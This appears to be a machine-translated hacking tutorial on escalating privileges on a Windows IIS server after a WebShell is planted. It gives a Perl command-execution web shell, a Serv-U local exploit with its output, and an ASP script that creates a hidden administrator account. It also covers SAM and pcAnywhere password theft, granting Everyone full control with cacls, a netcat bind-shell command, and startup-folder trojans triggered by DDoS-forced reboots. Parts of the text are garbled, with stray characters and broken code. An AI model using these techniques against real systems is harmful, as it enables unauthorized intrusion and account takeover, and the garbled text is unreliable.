This article combines many masters to improve the skills and some ideas
When we get a WebShell, the next thing to do is to improve the permissions.
Personal summary is as follows:
1: C: / Documents and Settings / All Users / Application Data / Symantec / PCANywhere /
See if you can jump to this directory, if it is the best, directly under its CIF file, get the PCANYWHERE password, log in
PS: Crack Tools This site has been provided. Please ask yourself!
2.c: / Winnt / System32 / Config /
Entroy this under its SAM, crack the user's password
Software for cracking SAM passwords is LC, Saminside
3.c: / Documents and Settings / All Users / "Start" menu / program /
Seeing that you can jump here, we can get a lot of useful information from here.
You can see a lot of shortcuts, we generally choose Serv-U, then view attributes locally, know if the path, see if you can jump
After entering, if there is permission to modify servudaemon.ini, add a user, password is empty
[User = wekwen | 1]
PASSWORD =
Homedir = C: /
TIMEOUT = 600
Maintenance = system
Access1 = C: / | rwamelcdp
Access1 = D: / | rwamelcdp
Access1 = f: / | rwamelcdp
SKEYVALUES =
This use ь 哂 哂 呷 呷 笪 梢 詅 詅 詅 上 q 詅 詅 詅 权 权 权 权 权 权
4.c: / Winnt / System32 / InetSRV / DATA /
It is this directory, which is also ERVERYONE complete control, what we have to do is uploading the tools of the promotion permissions, then execute
5. See if you can jump to the following directory
C: / PHP, use phpspy
C: / prel, sometimes it is not necessarily this directory (you can also know the attributes by downloading the property) WebShell with CGI
#! / usr / bin / perl
BinMode (stdout);
Syswrite (stdout, "content-type: text / html / r / n / r / n", 27);
$ _ = $ Env {query_string};
S /% 20 / / g;
S /% 2FIG;
$ execTHIS = $ _;
Syswrite (stdout, "
/ r / n", 13);Open (stderr, "> & stdout") || DIE "can't redirect stderr";
System ($ exECTHIS);
Syswrite (stdout, "/ r / n / r / n", 17);
Close (stderr);
Close (stdout);
EXIT;
Save as CGI execution,
If you can't, you can try the PL extension, change the CGI file just now to the PL file, submit
http: //ANYHOST / RMD.PL? DIR
Display "Reject Access", indicating that it can be executed! Submit right now: first upload a Su.exe (SER-U upgrade authority) to the Prel's bin directory
http: //ANYHOST / RMD.PL? C / Perl / Bin / Su.exe
return:
Serv-U> 3.x local Exploit by xiaoluusage: serv-u.exe "Command"
Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"
It is now IUSR permissions, submitted:
http: //anyhost/ -cmd.pl? c / perl / bin / su.exe "Cacls.exe C: / E / T / G Everyone: F"
http: //aNyhost/ -cmd.pl? c / perl / bin / su.exe "Cacls.exe D: / E / T / G Everyone: F"
http://enyhost/ -cmd.pl? c / perl / bin / su.exe "Cacls.exe E: / E / T / G Everyone: F"
http://enyhost/ -cmd.pl? c / perl / bin / su.exe "Cacls.exe f: / e / t / g everyone: f"
If the following information is returned, it will be successful.
Serv-U> 3.x local exploit by xiaolu
<220 Serv-U FTP Server V5.2 for Winsock Ready ...
> User Localadministrator
<331 User Name Okay, Need Password.
*********************************************************** ****
> Pass #l@ * * @p
<230 user logged in, proced.
*********************************************************** ****
> Site maintenance
*********************************************************** ****
CREATING New Domain ...
<200-DomainID = 2
<220 Domain Settings Saved
*********************************************************** ****
Domain XL: 2 Created
Creating Evil User
<200-user = XL
200 User Settings Saved
*********************************************************** ****
[ ] Now exploiting ...
> User XL
<331 User Name Okay, Need Password.
*********************************************************** ****
> Pass 111111
<230 user logged in, proced.
*********************************************************** ****
[ ] Now Executing: Cacls.exe C: / E / T / g Everyone: f
<220 Domain Deleted
Such all partitions are completely controlled for EVERYONE
Now we upgrade your users as an administrator:
http: //Anyhost/ -cmd.pl? c / perl / bin / su.exe "Net localgroup administrators IUSR_Anyhost / Add"
6. You can successfully run "CScript C: /ineTPub/adminScripts/adsutil.vbs Get W3SVC / InProcessisapiapps" to improve permission to use this CScript C: /inetpub/adminscripts/adsutil.vbs Get W3SVC / InprocessisapIAPPS
View DLL file with privilege: idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll
Add ASP.DLL to the privilege
Asp.dll is placed in c: /winnt/system32/inetsrv/asp.dll (the location of different machine is not necessarily the same)
We now add CScript Adsutil.vbs SET / W3SVC / INPROCESSISAPIAPPS "C: /Winnt/System32/IDQ.dll" "C: /Winnt/System32/inetsrv/httpext.dll" "C: / Winnt / System32 / InetSrv / httpodbc .dll "c: /winnt/system32/inetsrv/ssinc.dll" "c: /winnt/system32/msw3prt.dll" "C: / Winnt / System32 / InetSrv / as p.dll"
You can use the cscript adsutil.vbs get / w3svc / inprocessisapiapps to see if it is added.
7. You can also use this code to try to improve, as if the effect is not obvious
<% @ codepage = 936%> <% response.expires = 0
ON Error ResMe next
Session.Timeout = 50
Server.scripttimeout = 3000
Set lp = server.createObject ("wscript.network")
Oz = "Winnt: //" & lp.computername
Set ob = GetObject (oz)
Set oe = getObject (oz & "/ administrators, group")
Set = obs.create ("User", "Wekwen $")
Od.SetPassword "wekwen" <----- password
Od.setInfo
Set of = getObject (Oz & "/ Wekwen $, User")
OE.Add (of.adspath)
Response.write "Wekwen $ Super Account Establishment!"%>
Check if this code is checked
<% @ codepage = 936%>
<% Response.expires = 0
On Error ResMe Next 'Find Administrators Group Accounts
Set tn = server.createObject ("wscript.network")
Set objgroup = getObject ("Winnt: //" & Tn.computername & "/ Admi Nistrators, Group")
For Each Admin In Objgroup.members
Response.write admin.name & "
"NEXT
IF Err THEN
Response.write "No, WScript.Network"
END IF
%>
8.c: / program files / java web start /
If you can, it is generally small, you can try to use JSP's WebShell, I heard that the permissions are small, I have not met.
9. Finally, if the host setting is very metamorphosis, you can try the C: / Documents and Settings / All Users / "Start" menu / programs / start "to write BAT, VBS and other Trojans.
Wait until the host restarts or you DDOS forced it to restart to achieve the purpose of enhancement.
Summary, find the directory with execution and writing, what catalog, and then upload the improvement tool, finally executed, three words "find" "on" "execution"
The above is my own, everyone has a lot of ways to share
User0 = WebASP | 1 | 0
SKEYVALUES =
[User = WebASP | 1]
Password = NO7C154C45EDA5D0AABBBC7DD93B0AEB078
Homedir = C: /
TIMEOUT = 600
Maintenance = system
Access1 = C: / | rwamelcdp
SKEYVALUES =
FTP> Open IP
Connected to IP.
220 Serv-U FTP Server V4.1.0.0 for Winsock Ready ...
User (IP: (NONE)): ID // Input Construction User
331 USER Name Okay, please send complete e-mail address as password.
Password: password // password
230 User logged in, proced.
FTP> CD WinNT // Enter Win2K Winnt directory, if you are WinXP or Windows Server 2003, you should be a Windows directory.
250 Directory Changed to / Winnt
FTP> CD System32 // Enter the System32 directory
250 Directory Changed to / Winnt / System32
FTP> Quote Site Exec Net.exe User Name Password / Add // Use the system's NET.EXE file to add users.
200 Exec Command Successful (TID = 33).
FTP> Quote Site Exec Net.exe Localhost Administrators User Name / Add // Improved to Super User
